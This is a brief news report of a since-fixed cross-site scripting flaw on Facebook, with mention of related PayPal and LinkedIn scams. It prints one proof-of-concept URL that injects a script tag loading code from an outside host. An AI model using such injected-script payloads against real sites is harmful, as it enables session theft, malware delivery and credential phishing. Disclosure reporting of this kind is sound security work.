New Cross-Site Scripting Vulnerability Found On Facebook
According to XSSed, Facebook is vulnerable to a cross-site scripting flaw that leaves its users at risk from scripting attacks and login phishing. The security blog has posted a proof-of-concept demo of a flaw on the social networking website that could leave surfers vulnerable to malware. Attackers can also trick users into handing over their credentials through fake logins served up from third-party sites.
Here is a harmless proof of concept, shown at XSSed:
http://www.facebook.com/jobs/position.php?st=%3CSCRIPT%20SRC=//ha.ckers.org/.j%3E
Security watchers say that malware authors, spammers and scammers are paying increasing attention to social networking websites. This recent Facebook vulnerability comes shortly after the cross-site scripting exposure on Paypal.com.
Additional warnings of this kind of vulnerability come as network security firm Sophos detected a 419 scam email on business-focused social networking site LinkedIn earlier this week.
At this moment the flaw is still open. Facebook has already been notified of the vulnerability.
Update (May 27): Facebook fixed this vulnerability a couple of days ago.